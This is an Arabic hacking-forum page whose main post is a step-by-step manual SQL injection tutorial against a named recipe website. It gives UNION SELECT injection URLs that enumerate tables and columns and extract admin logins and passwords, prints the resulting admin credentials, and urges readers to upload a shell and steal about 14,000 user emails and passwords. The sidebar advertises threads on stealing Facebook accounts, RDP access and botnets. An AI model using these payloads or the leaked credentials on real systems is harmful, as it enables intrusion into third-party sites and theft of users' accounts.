منظمة الانونيموس الاسلامية للاختراق
اهلا بك فى منظمة انيموس الاسلامية للاختراق

دخول

لقد نسيت كلمة السر

بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» الدرس الأول ~ الحصول على RDP مجانا ~ دورة الهويـات المجهــولة
الجمعة 13 أكتوبر 2017, 10:42 pm من طرف hishamarsenal

» طريقتي في جلب حسابات rdp
الجمعة 06 أكتوبر 2017, 2:44 pm من طرف ايمان

» دورة اختراق خطوط الاتصالات hacker voip/sip 2015
الخميس 28 سبتمبر 2017, 3:33 pm من طرف rami abu hasna

» 100 الف حساب فيس بوك هدية
الأربعاء 27 سبتمبر 2017, 2:49 am من طرف حياتي

» افضل برنامج لسرقة اميلات الفيس بوك Hack Facebook Password
الأربعاء 30 أغسطس 2017, 8:27 pm من طرف الهاكر الاسطوري

» اكواد اختراق
الثلاثاء 29 أغسطس 2017, 4:00 pm من طرف الهاكر الاسطوري

» Get 30 days VPS in 30 seconds
الإثنين 10 يوليو 2017, 10:03 pm من طرف alimohamede

» حصرياً :شرح التحميل من rdp الى حاسوبك بسرعة البرق
الإثنين 10 يوليو 2017, 8:27 pm من طرف moatazmazao

» شرح كامل لـ BotNet Mirc على سيرفرات IRC
السبت 01 يوليو 2017, 12:49 am من طرف mohmed elsayed

نوفمبر 2017
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
  12345
6789101112
13141516171819
20212223242526
27282930   

اليومية اليومية

تدفق ال RSS


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 


المتواجدون الآن ؟
ككل هناك 8 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 8 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

[ مُعاينة اللائحة بأكملها ]


أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 176 بتاريخ الخميس 03 نوفمبر 2016, 12:28 am

اخترق الموقع بالحقن اليدوى

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

اخترق الموقع بالحقن اليدوى

مُساهمة من طرف Admin في السبت 11 مايو 2013, 5:31 pm

السلام عليكم ورحمه الله وبركاته
اليوم راح اعلمكم الاختراق اليدوى معانا على بركه الله
اول حاجه بتشوفلك حاجه اسمها Dork وده راس الثغره لان ده الى بيطلعلك مواقع دلوقتى انا اخترت دورك عاوز اجيب المواقع المصابه من غير تعب هنعمل ايه
هنخش على الموقع ده
http://isoftwarez.com/scanner/scanner/
تمام
نحط الدورك ونشوف المواقع الى هتطلعلنا
لو واحد جه بالون الرمادى يبقا مش مصاب لو بالون الابيض يبقى مصاب
تمام دلوقتى بقا جبنا موقع هنعمل ايه انا مثلا اخترت الموقع ده

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=410تمام عاوزين نعرف عدد العواميد المصابه بنعمل ايه بنحط الكلام ده ورا الرابط مع اضافه بعض الاشياء نشوف

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+order+by+20--شوفتوا ضيفت ايه ده الكود
=-410+order+by+20--
تمام ونشوف وكل شويه لو فى خطا نقلل الرقم
تمام دلوقتى طلع اهه فتح عند رقم 3 نشوف بقا انهى عمود مصاب

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+order+by+3--بتضيف الكود ده

كود:
+union+select+وتكتب وراه العواميد
يعنى احنا طلعلنا 3 يبقى كده

كود:
+union+select+1,2,3--تمام كده
انا طلعلى بردوا العمود رقم 3 حلو بقا اوى نستغل الموقع بقا

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,3--نضع الكود ده فى العمود المصاب

كود:
group_concat(table_name)وده فى النهايه

كود:
+from+information_schema.tables+where+table_schema=database()--تمام كده هيبقا الرابط كده

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29--تمام كده
شوفو ايه الى طلع

كود:
esnr_ad_groups,esnr_admin_control,esnr_admin_login,esnr_ads,esnr_categories,esnr_comments,esnr_emailed,esnr_ingredients,esnr_ratings,esnr_recipes,esnr_search_terms,esnr_subscribers,esnr_usersعاوزين نطلع مثلا الاميلات او الادمن والباص
هنعمل حاجه هنا بقا كتييير بيتطلغبط فيها بس انا هسهلهالكم
وركزوا بقا هنا
هنضع الكود ده مكان الكود الى شبهو الى فات

كود:
group_concat(column_name)وده بردو مكان الكود الى شبهوا الى فات

كود:
+from+information_schema.columns+where+table_schema=database()--شيفين الكلمه دى

كود:
database()دى بقا هنخش على الموقع ده
من هنا
http://www.waraxe.us/sql-char-encoder.html
تمام واختارنا مثلا esnr_admin_login
هنشفرها نحطها فى المربع الكبير
ونضغط encode now
وناخد الى فى المربع ده كوبى MySql hex-encoded string
انا شفرت الكلمه دى esnr_admin_login طلعت كده

كود:
0x65736e725f61646d696e5f6c6f67696eهنحطوا مكان كلمه

كود:
database()يبقى الموقع كلوا

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28column_name%29+from+information_schema.columns+where+table_name=0x65736e725f61646d696e5f6c6f67696e--تمام دلوقتى شوفو طلع لينا ايه
login,password,sessionkey
دلوقتى هنحط الكود ده مكان العمود المصاب

كود:
group_concat(login,0x3e,password)طبعا مع تغيير ما يلزم يعنى عشان انا طلعلى لوج ان وباسورد كتبتهم شوف انت هيطلعلك ايه واكتبوا انما الكلمه دى 0x3e عشان يعمل فصله مبين كل يوزر ويوزر تمام كده
وبعديها امسح كل الى بعد كلمه from
واكتب + واسم الجدول الى انت اخترتوا يعنى انا اخترت esnr_admin_login
تمام يبقى كده

كود:
form+esnr_admin_loginيبقى الموقع كامل

كود:
http://www.recipes.onlineweblibrary.com/recipe.php?recipeid=-410+union+select+1,2,group_concat%28login,0x3e,password%29+from+esnr_admin_login--تمام والف مبروك طلعلك الادمين
changeme>changeme
admin>noha2008
يوزرين ادخل وارفع شيل
وكمان الموقع ده فيه 14 الف اميل بالباصورد عاوزكم تسحبوهم وتشتغلو يلا يا رجاله
avatar
Admin
Admin
Admin

عدد المساهمات : 1255
تاريخ التسجيل : 22/11/2011
العمر : 21
الموقع : http://ahmed2012.yoo7.com

http://ahmed2012.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى